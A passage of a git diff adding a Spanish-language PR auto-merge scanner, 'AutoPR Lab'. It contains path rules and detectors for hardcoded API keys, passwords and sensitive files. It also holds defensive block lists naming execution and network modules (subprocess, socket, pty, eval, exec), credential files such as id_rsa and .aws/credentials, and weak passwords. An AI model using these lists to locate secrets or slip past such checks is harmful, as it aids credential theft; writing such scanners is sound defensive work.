Abre un PR — **AutoPR Lab lo revisará y mergeará automáticamente** si está bien formado + +```python +# detectors/mi_detector.py +from detectors.base_detector import BaseDetector, DetectorResult, DetectorStatus +from typing import List + +class MiDetector(BaseDetector): + @property + def name(self) -> str: + return "MiDetector" + + @property + def description(self) -> str: + return "Detecta X en el código" + + @property + def severity(self) -> str: + return "high" # critical | high | medium | low + + def analyze(self, file_path: str, content: str) -> List[DetectorResult]: + results = [] + # Tu lógica aquí... + return results +``` + +Ver guía completa: [docs/how-to-add-detector.md](docs/how-to-add-detector.md) + +--- + +## 📊 Ejemplo de Output + +### PR Rechazado (con API key) + +``` +❌ [ERROR] APIKeysDetector: Posible OpenAI API Key detectado + - Patrón detectado: sk-ab****ijk (detectors/bad.py, línea 5) + +❌ [ERROR] PasswordsDetector: Password hardcodeado en 'DATABASE_PASSWORD' + - Variable: DATABASE_PASSWORD (config.py, línea 12) + +DECISIÓN: REJECT +→ PR comentado y cerrado automáticamente +``` + +### PR Aprobado (detector limpio) + +``` +✅ [OK] DetectorFormatValidator: Estructura del detector válida +✅ [OK] APIKeysDetector: Sin credenciales detectadas +✅ [OK] PasswordsDetector: Sin passwords hardcodeados +✅ [OK] SensitiveFilesDetector: Sin archivos sensibles + +DECISIÓN: MERGE +→ PR aprobado y mergeado automáticamente en 89ms +``` + +Ver más ejemplos: [docs/example-outputs.md](docs/example-outputs.md) + +--- + +## 🔒 Modelo de Seguridad + +### Protección contra abuso +- **Validación de paths**: Solo archivos en rutas explícitamente permitidas +- **Análisis estático de AST**: Los detectores nuevos son analizados con `ast.parse()` antes de ser aceptados +- **Imports prohibidos**: `subprocess`, `socket`, `requests`, `eval`, `exec` son bloqueados automáticamente +- **Límites de tamaño**: PRs grandes requieren revisión manual +- **Sin ejecución de código**: Los 
detectores NUNCA ejecutan el código que analizan, solo lo leen como texto + +### Qué requiere revisión manual +Cualquier cambio en estas áreas **nunca se auto-mergea**: +- El motor de decisión (`core/`, `scripts/`) +- Los workflows de GitHub Actions +- Las dependencias del proyecto diff --git a/core/__init__.py b/core/__init__.py new file mode 100644 index 0000000..8a3607c --- /dev/null +++ b/core/__init__.py @@ -0,0 +1,5 @@ +"""AutoPR Lab - Core Package""" + +from core.scanner import Scanner, ScanResult, SecurityRules + +__all__ = ["Scanner", "ScanResult", "SecurityRules"] diff --git a/core/scanner.py b/core/scanner.py new file mode 100644 index 0000000..908a88e --- /dev/null +++ b/core/scanner.py @@ -0,0 +1,271 @@ +""" +AutoPR Lab - Core Scanner +=========================== +Motor principal de análisis de Pull Requests. +Orquesta todos los detectores y genera el reporte final. +""" + +import json +import time +from dataclasses import asdict, dataclass, field +from typing import Any + +from detectors import discover_detectors +from detectors.base_detector import DetectorResult, DetectorStatus +from utils.logger import get_logger + +logger = get_logger("scanner") + + +@dataclass +class ScanResult: + """Resultado completo del análisis de un PR.""" + + # Estado global del PR + global_status: str # "OK" | "WARNING" | "ERROR" + decision: str # "MERGE" | "WARN_MERGE" | "REJECT" + + # Métricas del PR + pr_number: int + files_analyzed: int + total_findings: int + errors: int + warnings: int + ok_count: int + + # Resultados por archivo + findings: list[dict[str, Any]] = field(default_factory=list) + + # Metadata + scan_duration_ms: float = 0.0 + detectors_run: list[str] = field(default_factory=list) + timestamp: str = "" + + # Validación de seguridad del PR (path rules) + path_validation: dict[str, Any] = field(default_factory=dict) + + def to_dict(self) -> dict[str, Any]: + return asdict(self) + + def to_json(self, indent: int = 2) -> str: + return 
json.dumps(self.to_dict(), indent=indent, ensure_ascii=False) + + +class SecurityRules: + """ + Reglas de seguridad para el auto-merge. + Define qué archivos y condiciones son aceptables para merge automático. + """ + + # Paths permitidos para auto-merge (solo estos) + ALLOWED_PATHS = [ + "detectors/", + "tests/", + "docs/", + "examples/", + "README.md", + "CHANGELOG.md", + ".github/ISSUE_TEMPLATE/", + ] + + # Paths SIEMPRE prohibidos (bloquean el merge aunque todo lo demás sea OK) + FORBIDDEN_PATHS = [ + "core/", + ".github/workflows/", + "scripts/", + "requirements.txt", + "setup.py", + "setup.cfg", + "pyproject.toml", + "Makefile", + ".gitignore", + ] + + # Límites cuantitativos + MAX_FILES = 10 + MAX_LINES_CHANGED = 500 + + @classmethod + def validate_paths(cls, changed_files: list[str]) -> tuple[bool, list[str]]: + """ + Valida que todos los archivos modificados están en paths permitidos. + + Returns: + (is_valid, list_of_violations) + """ + violations = [] + + for file_path in changed_files: + # Verificar si está en paths prohibidos (prioridad máxima) + is_forbidden = any( + file_path.startswith(forbidden) or file_path == forbidden + for forbidden in cls.FORBIDDEN_PATHS + ) + if is_forbidden: + violations.append( + f"🚫 PROHIBIDO: `{file_path}` (ruta crítica del sistema)" + ) + continue + + # Verificar si está en paths permitidos + is_allowed = any( + file_path.startswith(allowed) or file_path == allowed + for allowed in cls.ALLOWED_PATHS + ) + if not is_allowed: + violations.append( + f"❌ NO PERMITIDO: `{file_path}` " + f"(solo se permite modificar: {', '.join(cls.ALLOWED_PATHS)})" + ) + + return len(violations) == 0, violations + + @classmethod + def validate_size( + cls, num_files: int, lines_changed: int + ) -> tuple[bool, list[str]]: + """Valida que el PR no es demasiado grande.""" + violations = [] + + if num_files > cls.MAX_FILES: + violations.append( + f"El PR modifica {num_files} archivos (máximo permitido: {cls.MAX_FILES})" + ) + + if lines_changed > 
cls.MAX_LINES_CHANGED: + violations.append( + f"El PR tiene {lines_changed} líneas cambiadas (máximo permitido: {cls.MAX_LINES_CHANGED})" + ) + + return len(violations) == 0, violations + + +class Scanner: + """ + Motor principal de escaneo de PRs. + """ + + def __init__(self) -> None: + self.detector_classes = discover_detectors() + self.detectors = [cls() for cls in self.detector_classes] + logger.info( + f"Scanner inicializado con {len(self.detectors)} detectores: " + f"{[d.name for d in self.detectors]}" + ) + + def scan_file(self, file_path: str, content: str) -> list[DetectorResult]: + """Ejecuta todos los detectores sobre un archivo.""" + all_results = [] + + for detector in self.detectors: + try: + if not detector.should_skip(file_path): + results = detector.analyze(file_path, content) + all_results.extend(results) + logger.debug( + f" {detector.name}: {len(results)} findings en {file_path}" + ) + except Exception as e: + logger.error( + f"Error en detector {detector.name} analizando {file_path}: {e}" + ) + all_results.append( + DetectorResult( + status=DetectorStatus.WARNING, + detector_name=detector.name, + message=f"Error interno del detector: {str(e)}", + file_path=file_path, + ) + ) + + return all_results + + def scan_pr( + self, + pr_number: int, + changed_files: dict[str, str], # {file_path: content} + lines_changed: int = 0, + ) -> ScanResult: + """ + Analiza todos los archivos de un PR y genera el resultado global. + + Args: + pr_number: Número del PR en GitHub + changed_files: Diccionario {ruta_archivo: contenido} + lines_changed: Total de líneas modificadas + """ + start_time = time.time() + logger.info(f"🔍 Iniciando análisis del PR #{pr_number}") + logger.info(f" Archivos a analizar: {len(changed_files)}") + + all_findings = [] + + # ── 1. 
Validación de paths (seguridad del sistema) ── + path_ok, path_violations = SecurityRules.validate_paths( + list(changed_files.keys()) + ) + size_ok, size_violations = SecurityRules.validate_size( + len(changed_files), lines_changed + ) + + path_validation = { + "paths_ok": path_ok, + "size_ok": size_ok, + "violations": path_violations + size_violations, + } + + if path_violations: + logger.warning(f" ⚠️ Violaciones de paths: {path_violations}") + + # ── 2. Análisis de contenido con detectores ── + for file_path, content in changed_files.items(): + logger.info(f" Analizando: {file_path}") + file_results = self.scan_file(file_path, content) + + if file_results: + for r in file_results: + all_findings.append(r.to_dict()) + level = r.status.value + logger.info(f" [{level}] {r.detector_name}: {r.message}") + + # ── 3. Calcular métricas ── + errors = sum(1 for f in all_findings if f["status"] == "ERROR") + warnings = sum(1 for f in all_findings if f["status"] == "WARNING") + ok_count = sum(1 for f in all_findings if f["status"] == "OK") + + # ── 4. 
Determinar estado global y decisión ── + has_path_violations = not path_ok or not size_ok + + if has_path_violations or errors > 0: + global_status = "ERROR" + decision = "REJECT" + elif warnings > 0: + global_status = "WARNING" + decision = "WARN_MERGE" + else: + global_status = "OK" + decision = "MERGE" + + duration_ms = (time.time() - start_time) * 1000 + + result = ScanResult( + global_status=global_status, + decision=decision, + pr_number=pr_number, + files_analyzed=len(changed_files), + total_findings=len(all_findings), + errors=errors, + warnings=warnings, + ok_count=ok_count, + findings=all_findings, + scan_duration_ms=round(duration_ms, 2), + detectors_run=[d.name for d in self.detectors], + timestamp=time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()), + path_validation=path_validation, + ) + + logger.info(f"✅ Análisis completado en {duration_ms:.0f}ms") + logger.info(f" Estado: {global_status} | Decisión: {decision}") + logger.info(f" Errores: {errors} | Advertencias: {warnings} | OK: {ok_count}") + + return result diff --git a/detectors/__init__.py b/detectors/__init__.py new file mode 100644 index 0000000..215bb2d --- /dev/null +++ b/detectors/__init__.py @@ -0,0 +1,44 @@ +""" +AutoPR Lab - Detectors Package +================================ +Auto-descubrimiento de detectores. +Cualquier clase que herede de BaseDetector es registrada automáticamente. +""" + +import importlib +import inspect +import os + +from detectors.base_detector import BaseDetector + + +def discover_detectors() -> list[type[BaseDetector]]: + """ + Descubre automáticamente todos los detectores en este paquete. + No necesitas registrarlos manualmente. 
+ """ + detectors = [] + detectors_dir = os.path.dirname(__file__) + + for filename in sorted(os.listdir(detectors_dir)): + if filename.endswith(".py") and filename not in ( + "__init__.py", + "base_detector.py", + ): + module_name = filename[:-3] # quitar .py + try: + module = importlib.import_module(f"detectors.{module_name}") + for _name, obj in inspect.getmembers(module, inspect.isclass): + if ( + issubclass(obj, BaseDetector) + and obj is not BaseDetector + and obj.__module__ == module.__name__ + ): + detectors.append(obj) + except ImportError as e: + print(f"[WARN] No se pudo cargar detector {module_name}: {e}") + + return detectors + + +__all__ = ["BaseDetector", "discover_detectors"] diff --git a/detectors/api_keys_detector.py b/detectors/api_keys_detector.py new file mode 100644 index 0000000..3c34637 --- /dev/null +++ b/detectors/api_keys_detector.py @@ -0,0 +1,170 @@ +""" +AutoPR Lab - API Keys Detector +================================ +Detecta API keys, tokens y credenciales expuestas en el código fuente. +""" + +import re + +from detectors.base_detector import BaseDetector, DetectorResult, DetectorStatus + + +class APIKeysDetector(BaseDetector): + """ + Detecta patrones conocidos de API keys y tokens en el código. + Cubre: AWS, GCP, GitHub, Stripe, Twilio, OpenAI, HuggingFace, etc. + """ + + # Formato: (nombre_servicio, regex_pattern) + PATTERNS = [ + # AWS + ("AWS Access Key", r"(? 
str: + return "APIKeysDetector" + + @property + def description(self) -> str: + return ( + "Detecta API keys, tokens y credenciales hardcodeadas en el código fuente" + ) + + @property + def severity(self) -> str: + return "critical" + + def should_skip(self, file_path: str) -> bool: + if super().should_skip(file_path): + return True + # Ignorar archivos de lock y dependencias + skip_paths = ["package-lock.json", "yarn.lock", "poetry.lock", "Pipfile.lock"] + return any(skip in file_path for skip in skip_paths) + + def _is_safe_line(self, line: str) -> bool: + """Verifica si una línea coincide con patrones seguros (falsos positivos).""" + for safe_pattern in self.SAFE_PATTERNS: + if re.search(safe_pattern, line, re.IGNORECASE): + return True + return False + + def analyze(self, file_path: str, content: str) -> list[DetectorResult]: + if self.should_skip(file_path): + return [] + + results = [] + lines = content.splitlines() + + for line_num, line in enumerate(lines, start=1): + if self._is_safe_line(line): + continue + + for service_name, pattern in self.PATTERNS: + match = re.search(pattern, line) + if match: + # Ocultar el valor real en el reporte + detected_value = match.group(0) + masked = self._mask_secret(detected_value) + + results.append( + DetectorResult( + status=DetectorStatus.ERROR, + detector_name=self.name, + message=f"Posible {service_name} detectado", + details=[ + f"Patrón detectado: `{masked}`", + f"Línea completa: `{line.strip()[:80]}...`" + if len(line) > 80 + else f"Línea: `{line.strip()}`", + "⚠️ Nunca hardcodees credenciales. 
Usa variables de entorno o un secrets manager.", + ], + file_path=file_path, + line_number=line_num, + ) + ) + break # Un problema por línea es suficiente + + return results + + def _mask_secret(self, secret: str) -> str: + """Enmascara un secreto para el reporte (muestra solo inicio y fin).""" + if len(secret) <= 8: + return "*" * len(secret) + visible = 4 + return secret[:visible] + "*" * (len(secret) - visible * 2) + secret[-visible:] diff --git a/detectors/base_detector.py b/detectors/base_detector.py new file mode 100644 index 0000000..cea7a5a --- /dev/null +++ b/detectors/base_detector.py @@ -0,0 +1,110 @@ +""" +AutoPR Lab - Base Detector +========================== +Clase base para todos los detectores del sistema. +Todo detector nuevo DEBE heredar de esta clase. +""" + +from abc import ABC, abstractmethod +from dataclasses import dataclass, field +from enum import StrEnum +from typing import Any + + +class DetectorStatus(StrEnum): + OK = "OK" + WARNING = "WARNING" + ERROR = "ERROR" + + +@dataclass +class DetectorResult: + """Resultado estándar de un detector.""" + + status: DetectorStatus + detector_name: str + message: str + details: list[str] = field(default_factory=list) + file_path: str | None = None + line_number: int | None = None + + def to_dict(self) -> dict[str, Any]: + return { + "status": self.status.value, + "detector_name": self.detector_name, + "message": self.message, + "details": self.details, + "file_path": self.file_path, + "line_number": self.line_number, + } + + def __str__(self) -> str: + icon_map: dict[str, str] = {"OK": "✅", "WARNING": "⚠️", "ERROR": "❌"} + icon = icon_map.get(self.status.value, "?") + base = f"{icon} [{self.status.value}] {self.detector_name}: {self.message}" + if self.file_path: + base += f" (file: {self.file_path}" + if self.line_number: + base += f", line: {self.line_number}" + base += ")" + return base + + +class BaseDetector(ABC): + """ + Clase base abstracta para todos los detectores de AutoPR Lab. 
+ + Para agregar un detector nuevo: + 1. Crea un archivo en /detectors/mi_detector.py + 2. Hereda de BaseDetector + 3. Implementa el método `analyze` + 4. El sistema lo detectará automáticamente + + Ver: docs/how-to-add-detector.md + """ + + @property + @abstractmethod + def name(self) -> str: + """Nombre único del detector (usado en reportes).""" + raise NotImplementedError + + @property + @abstractmethod + def description(self) -> str: + """Descripción breve de qué analiza este detector.""" + raise NotImplementedError + + @property + def severity(self) -> str: + """Nivel de severidad por defecto: 'critical', 'high', 'medium', 'low'.""" + return "high" + + @abstractmethod + def analyze(self, file_path: str, content: str) -> list[DetectorResult]: + """ + Analiza el contenido de un archivo. + ... + """ + raise NotImplementedError + + def should_skip(self, file_path: str) -> bool: + """ + Define si este detector debe ignorar un archivo. + Override para personalizar (ej: ignorar archivos de tests). + """ + skip_extensions = { + ".png", + ".jpg", + ".jpeg", + ".gif", + ".ico", + ".svg", + ".pdf", + ".zip", + ".tar", + ".gz", + ".bin", + ".lock", + } + return any(file_path.endswith(ext) for ext in skip_extensions) diff --git a/detectors/detector_validator.py b/detectors/detector_validator.py new file mode 100644 index 0000000..bf3f9e8 --- /dev/null +++ b/detectors/detector_validator.py @@ -0,0 +1,256 @@ +""" +AutoPR Lab - Detector Format Validator +======================================== +Valida que los detectores nuevos cumplan con la estructura requerida. +Protección contra contribuciones maliciosas o mal formadas. +""" + +import ast +import os + +from detectors.base_detector import BaseDetector, DetectorResult, DetectorStatus + + +class DetectorFormatValidator(BaseDetector): + """ + Valida la estructura y seguridad de los detectores nuevos en el PR. + Este detector es especial: analiza código Python de otros detectores. 
+ """ + + # Imports prohibidos en detectores (podrían ejecutar código arbitrario o red) + FORBIDDEN_IMPORTS = { + "subprocess", + "os.system", + "eval", + "exec", + "importlib", + "pty", + "pexpect", + "socket", + "requests", + "urllib", + "http.client", + "ftplib", + "smtplib", + "poplib", + "ctypes", + "cffi", + "sys", + "shutil", + "posix", + "__import__", + "pickle", + "marshal", + "shelve", + } + + # Funciones peligrosas (built-ins y de módulos comunes) + FORBIDDEN_FUNCTIONS = { + "eval", + "exec", + "compile", + "__import__", + "open", + "system", + "popen", + "spawnl", + "spawnv", + "spawnlp", + "spawnvp", + "execl", + "execv", + "execle", + "execve", + "execlp", + "execvp", + "run", + "call", + "check_call", + "check_output", + "getstatusoutput", + "getoutput", + } + + # Atributos requeridos en todo detector + REQUIRED_PROPERTIES = {"name", "description", "severity", "analyze"} + + @property + def name(self) -> str: + return "DetectorFormatValidator" + + @property + def description(self) -> str: + return "Valida que los detectores nuevos siguen la estructura requerida y no contienen código peligroso" + + @property + def severity(self) -> str: + return "critical" + + def should_skip(self, file_path: str) -> bool: + # Solo analizar archivos Python en /detectors/ + if not file_path.endswith(".py"): + return True + if "detectors/" not in file_path and "detectors\\" not in file_path: + return True + # No analizarse a sí mismo ni al base + filename = os.path.basename(file_path) + if filename in ("base_detector.py", "detector_validator.py", "__init__.py"): + return True + return False + + def _check_forbidden_imports( + self, tree: ast.AST, file_path: str + ) -> list[DetectorResult]: + results = [] + for node in ast.walk(tree): + if isinstance(node, (ast.Import, ast.ImportFrom)): + if isinstance(node, ast.Import): + modules = [alias.name for alias in node.names] + else: + modules = [node.module] if node.module else [] + + for module in modules: + if module and 
any( + module.startswith(forbidden) + for forbidden in self.FORBIDDEN_IMPORTS + ): + results.append( + DetectorResult( + status=DetectorStatus.ERROR, + detector_name=self.name, + message=f"Import prohibido en detector: `{module}`", + details=[ + "Los detectores no pueden importar módulos de red o ejecución de código.", + f"Módulo bloqueado: `{module}`", + "Los detectores solo pueden usar: re, os.path, typing, y módulos estándar seguros.", + ], + file_path=file_path, + line_number=node.lineno, + ) + ) + return results + + def _check_forbidden_calls( + self, tree: ast.AST, file_path: str + ) -> list[DetectorResult]: + results = [] + for node in ast.walk(tree): + if isinstance(node, ast.Call): + func_name = None + if isinstance(node.func, ast.Name): + func_name = node.func.id + elif isinstance(node.func, ast.Attribute): + func_name = node.func.attr + + if func_name and func_name in self.FORBIDDEN_FUNCTIONS: + results.append( + DetectorResult( + status=DetectorStatus.ERROR, + detector_name=self.name, + message=f"Función peligrosa en detector: `{func_name}()`", + details=[ + f"`{func_name}()` puede ejecutar código arbitrario o acceder al sistema y está prohibida.", + "Los detectores solo deben analizar texto, no ejecutar código ni realizar operaciones de sistema.", + ], + file_path=file_path, + line_number=getattr(node, "lineno", None), + ) + ) + return results + + def _check_inherits_base( + self, tree: ast.AST, file_path: str + ) -> list[DetectorResult]: + results = [] + found_detector_class = False + + for node in ast.walk(tree): + if isinstance(node, ast.ClassDef): + base_names = [] + for base in node.bases: + if isinstance(base, ast.Name): + base_names.append(base.id) + elif isinstance(base, ast.Attribute): + base_names.append(base.attr) + + if "BaseDetector" in base_names: + found_detector_class = True + + # Verificar que implementa los métodos requeridos + implemented = set() + for item in node.body: + if isinstance(item, (ast.FunctionDef, ast.AsyncFunctionDef)): 
+ implemented.add(item.name) + + missing = self.REQUIRED_PROPERTIES - implemented + if missing: + results.append( + DetectorResult( + status=DetectorStatus.ERROR, + detector_name=self.name, + message=f"Detector `{node.name}` no implementa métodos requeridos", + details=[ + f"Métodos/propiedades faltantes: {', '.join(f'`{m}`' for m in missing)}", + "Todo detector debe implementar: `name`, `description`, `severity`, `analyze`", + ], + file_path=file_path, + line_number=node.lineno, + ) + ) + + if not found_detector_class: + results.append( + DetectorResult( + status=DetectorStatus.ERROR, + detector_name=self.name, + message="El archivo no contiene ninguna clase que herede de `BaseDetector`", + details=[ + "Los detectores deben heredar de `BaseDetector`.", + "Ejemplo: `class MyDetector(BaseDetector):`", + "Ver: docs/how-to-add-detector.md", + ], + file_path=file_path, + ) + ) + + return results + + def analyze(self, file_path: str, content: str) -> list[DetectorResult]: + if self.should_skip(file_path): + return [] + + results = [] + + # Intentar parsear el AST + try: + tree = ast.parse(content) + except SyntaxError as e: + return [ + DetectorResult( + status=DetectorStatus.ERROR, + detector_name=self.name, + message=f"Error de sintaxis en el detector: {e.msg}", + details=[f"Línea {e.lineno}: {e.text}"], + file_path=file_path, + line_number=e.lineno, + ) + ] + + results.extend(self._check_forbidden_imports(tree, file_path)) + results.extend(self._check_forbidden_calls(tree, file_path)) + results.extend(self._check_inherits_base(tree, file_path)) + + if not results: + results.append( + DetectorResult( + status=DetectorStatus.OK, + detector_name=self.name, + message="Estructura del detector válida", + details=[ + "El detector cumple con todos los requisitos de formato y seguridad." 
+ ], + file_path=file_path, + ) + ) + + return results diff --git a/detectors/passwords_detector.py b/detectors/passwords_detector.py new file mode 100644 index 0000000..5a87747 --- /dev/null +++ b/detectors/passwords_detector.py @@ -0,0 +1,165 @@ +""" +AutoPR Lab - Passwords Detector +================================= +Detecta contraseñas hardcodeadas y credenciales inseguras en el código. +""" + +import re + +from detectors.base_detector import BaseDetector, DetectorResult, DetectorStatus + + +class PasswordsDetector(BaseDetector): + """ + Detecta contraseñas y credenciales hardcodeadas en asignaciones directas. + Analiza patrones como: password = "secret123", pwd = "admin" + """ + + # Patrones de asignación de contraseñas + ASSIGNMENT_PATTERNS = [ + # password = "value" en múltiples formatos + ( + r"""(password|passwd|pwd|pass|secret|credential|cred|auth_token|access_token)\s*[:=]\s*['"]([^'"]{4,})['"]""", + "Password hardcodeado", + ), + # En JSON/YAML + ( + r"""['"](password|passwd|pwd|pass|secret|token|api_key|auth)['"]\s*:\s*['"]([^'"]{4,})['"]""", + "Credencial en configuración", + ), + # Conexiones a base de datos + ( + r"""(db_pass|database_password|db_password|mysql_pass|mongo_pass)\s*[:=]\s*['"]([^'"]{4,})['"]""", + "Contraseña de base de datos", + ), + # Tokens en código + ( + r"""(auth_token|access_token|refresh_token|secret_key|signing_key)\s*[:=]\s*['"]([^'"]{8,})['"]""", + "Token de autenticación hardcodeado", + ), + # Variables de entorno hardcodeadas dentro del código (no en .env) + ( + r"""os\.environ\[['"](password|secret|token|key)['"]\]\s*=\s*['"]([^'"]{4,})['"]""", + "Asignación directa de variable de entorno sensible", + ), + ] + + # Contraseñas triviales/débiles que siempre son un error + TRIVIAL_PASSWORDS = { + "password", + "123456", + "12345678", + "qwerty", + "admin", + "root", + "welcome", + "letmein", + "monkey", + "dragon", + "master", + "password1", + "abc123", + "test", + "testing", + "changeme", + "default", + "pass", + "secret", 
+ "1234", + "1111", + "0000", + "admin123", + "pass123", + } + + # Patrones a ignorar (falsos positivos) + FALSE_POSITIVE_PATTERNS = [ + r"^\s*#", # Comentarios + r"^\s*//", # Comentarios JS + r"example\.com", # Ejemplos + r"your[-_]?password", # Instrucciones + r"your[-_]?", # Cualquier YOUR_ prefix + r"", # Placeholders XML + r"\$\{[^}]+\}", # Variables en templates + r"os\.getenv\(", # Lectura de env vars + r"environ\.get\(", # Lectura de env vars + r"process\.env\.", # Node.js env vars + r"getenv\(", # C/PHP getenv + r"config\[", # Acceso a config objects + r"settings\.", # Django settings + r"# noqa", # Exclusiones explícitas + r"# nosec", # Exclusiones de bandit + r"CHANGE_ME", # Placeholder explícito + r"REPLACE_", # Placeholder explícito + r"_HERE", # Placeholder tipo KEY_HERE + r"placeholder", # Palabra placeholder + r"<[A-Z_]+>", # Placeholders tipo + ] + + @property + def name(self) -> str: + return "PasswordsDetector" + + @property + def description(self) -> str: + return "Detecta contraseñas hardcodeadas y credenciales débiles en el código fuente" + + @property + def severity(self) -> str: + return "critical" + + def _is_false_positive(self, line: str) -> bool: + for pattern in self.FALSE_POSITIVE_PATTERNS: + if re.search(pattern, line, re.IGNORECASE): + return True + return False + + def _check_trivial_password(self, value: str) -> bool: + return value.strip().lower() in self.TRIVIAL_PASSWORDS + + def analyze(self, file_path: str, content: str) -> list[DetectorResult]: + if self.should_skip(file_path): + return [] + + results = [] + lines = content.splitlines() + + for line_num, line in enumerate(lines, start=1): + if self._is_false_positive(line): + continue + + for pattern, description in self.ASSIGNMENT_PATTERNS: + match = re.search(pattern, line, re.IGNORECASE) + if match: + groups = match.groups() + variable_name = groups[0] if groups else "unknown" + secret_value = groups[-1] if len(groups) > 1 else "" + + # Verificar si es una contraseña 
trivial (aún más crítico) + is_trivial = self._check_trivial_password(secret_value) + + status = DetectorStatus.ERROR + details = [ + f"Variable: `{variable_name}`", + f"Valor detectado: `{'*' * len(secret_value)}`", + "🔒 Usa variables de entorno o un secrets manager (Vault, AWS Secrets Manager, etc.)", + ] + + if is_trivial: + details.append( + f"⚠️ CRÍTICO: La contraseña '{secret_value}' es trivialmente débil y conocida" + ) + + results.append( + DetectorResult( + status=status, + detector_name=self.name, + message=f"{description} en variable '{variable_name}'", + details=details, + file_path=file_path, + line_number=line_num, + ) + ) + break + + return results diff --git a/detectors/sensitive_files_detector.py b/detectors/sensitive_files_detector.py new file mode 100644 index 0000000..0553a71 --- /dev/null +++ b/detectors/sensitive_files_detector.py @@ -0,0 +1,253 @@ +""" +AutoPR Lab - Sensitive Files Detector +======================================= +Detecta archivos sensibles incluidos accidentalmente en el PR: +.env, config secrets, private keys, certificados, etc. +""" + +import os +import re + +from detectors.base_detector import BaseDetector, DetectorResult, DetectorStatus + + +class SensitiveFilesDetector(BaseDetector): + """ + Detecta si el PR incluye archivos que NUNCA deberían estar en un repositorio. + Analiza el nombre del archivo y su contenido. 
+ """ + + # Archivos que NUNCA deben aparecer en un PR + FORBIDDEN_FILES = { + # Variables de entorno + ".env", + ".env.local", + ".env.production", + ".env.development", + ".env.staging", + ".env.test", + ".env.backup", + # Configuraciones de secretos + "secrets.yml", + "secrets.yaml", + "secrets.json", + "credentials.json", + "credentials.yml", + "config.secret.yml", + "config.secret.json", + "local_settings.py", # Django + # Claves privadas y certificados + "id_rsa", + "id_dsa", + "id_ecdsa", + "id_ed25519", + "id_rsa.pub", + "id_ecdsa.pub", + "id_ed25519.pub", + "private.key", + "private.pem", + "server.key", + "client.key", + "ca.key", + "*.pfx", + "*.p12", + "keystore.jks", + # Archivos de bases de datos + "*.sqlite", + "*.sqlite3", + "*.db", + "dump.sql", + "backup.sql", + "database.sql", + # Configuración de servicios cloud + ".aws/credentials", + ".aws/config", + "gcloud-key.json", + "service-account.json", + "firebase-adminsdk*.json", + "firebase.json", + "google-services.json", + # Archivos de configuración local de IDEs con datos sensibles + ".idea/workspace.xml", + "*.suo", # Visual Studio + # Terraform state (puede contener secretos) + "terraform.tfstate", + "terraform.tfstate.backup", + "*.tfvars", # Excepto ejemplo: *.tfvars.example + # Archivos de contraseñas + "htpasswd", + ".htpasswd", + "passwd", + "shadow", + } + + # Extensiones siempre prohibidas + FORBIDDEN_EXTENSIONS = { + ".pem", + ".key", + ".pfx", + ".p12", + ".jks", + ".pkcs12", + ".crt", + ".cer", + ".der", + } + + # Patrones en el contenido que indican archivo sensible + SENSITIVE_CONTENT_PATTERNS = [ + (r"-----BEGIN (RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----", "Clave privada PEM"), + (r"-----BEGIN CERTIFICATE-----", "Certificado SSL/TLS"), + (r"-----BEGIN PGP PRIVATE KEY BLOCK-----", "Clave privada PGP"), + # .env con valores reales (no placeholders) + ( + 
r"(?m)^(export\s+)?[A-Z_]*(PASSWORD|SECRET|TOKEN|KEY|API_KEY)\s*=\s*(?!YOUR_|your_|<|CHANGE_ME|REPLACE|example|placeholder|xxx|none|null|false|true|\$\{)[^\s\$<\"']{6,}", + ".env con valores reales", + ), + (r"\[default\]\s*\naws_access_key_id", "Archivo de credenciales AWS"), + (r'"type"\s*:\s*"service_account"', "Clave de servicio de Google"), + ] + + # Advertencias: archivos que podrían ser sensibles según contexto + WARNING_FILES = { + ".env.example", + ".env.template", + ".env.sample", + "config.example.yml", + "settings.example.py", + } + + @property + def name(self) -> str: + return "SensitiveFilesDetector" + + @property + def description(self) -> str: + return "Detecta archivos sensibles (.env, keys, certificados) que no deben estar en el repositorio" + + @property + def severity(self) -> str: + return "critical" + + def should_skip(self, file_path: str) -> bool: + # Este detector NO omite ningún archivo por extensión + return False + + def _get_filename(self, file_path: str) -> str: + return os.path.basename(file_path).lower() + + def _is_forbidden_file(self, file_path: str) -> bool: + filename = self._get_filename(file_path) + file_path_lower = file_path.lower() + filename_lower = filename.lower() + + # Si está en WARNING_FILES, no es forbidden (tiene su propio tratamiento) + if self._is_warning_file(file_path): + return False + + # Verificar nombre exacto contra la lista de prohibidos + forbidden_lower = {f.lower() for f in self.FORBIDDEN_FILES if "*" not in f} + if filename_lower in forbidden_lower: + return True + + # Verificar rutas específicas con path separator (ej: .aws/credentials) + for forbidden in self.FORBIDDEN_FILES: + if "/" in forbidden and forbidden.lower() in file_path_lower: + return True + + # Verificar extensión + _, ext = os.path.splitext(filename) + if ext in self.FORBIDDEN_EXTENSIONS: + return True + + # Verificar patrones con wildcards + for forbidden in self.FORBIDDEN_FILES: + if "*" in forbidden: + pattern = r"^" + 
forbidden.replace(".", r"\.").replace("*", ".*") + r"$" + if re.match(pattern, filename, re.IGNORECASE): + return True + + return False + + def _is_warning_file(self, file_path: str) -> bool: + filename = self._get_filename(file_path) + return filename in {f.lower() for f in self.WARNING_FILES} + + def analyze(self, file_path: str, content: str) -> list[DetectorResult]: + results = [] + filename = self._get_filename(file_path) + + # ERROR: Archivo completamente prohibido + if self._is_forbidden_file(file_path): + results.append( + DetectorResult( + status=DetectorStatus.ERROR, + detector_name=self.name, + message=f"Archivo sensible prohibido: `{filename}`", + details=[ + f"Ruta detectada: `{file_path}`", + "🚫 Este tipo de archivo NUNCA debe estar en el repositorio.", + "💡 Agrégalo a .gitignore inmediatamente.", + "🔐 Si ya fue expuesto: rota todas las credenciales involucradas.", + ], + file_path=file_path, + ) + ) + return results + + # WARNING: Archivo de ejemplo/template (puede ser intencional) + if self._is_warning_file(file_path): + # Verificar que no tenga valores reales + has_real_values = any( + re.search(pattern, content, re.MULTILINE | re.IGNORECASE) + for pattern, _ in self.SENSITIVE_CONTENT_PATTERNS + ) + + if has_real_values: + results.append( + DetectorResult( + status=DetectorStatus.ERROR, + detector_name=self.name, + message=f"Archivo de template con valores reales: `{filename}`", + details=[ + "El archivo parece un template (.example/.sample) pero contiene valores reales.", + "Reemplaza los valores reales con placeholders: ${YOUR_SECRET_HERE}", + ], + file_path=file_path, + ) + ) + else: + results.append( + DetectorResult( + status=DetectorStatus.WARNING, + detector_name=self.name, + message=f"Archivo de template detectado: `{filename}`", + details=[ + "Este archivo de ejemplo/template es aceptable si solo contiene placeholders.", + "✅ Asegúrate de que los valores sean ficticios (ej: YOUR_API_KEY_HERE).", + ], + 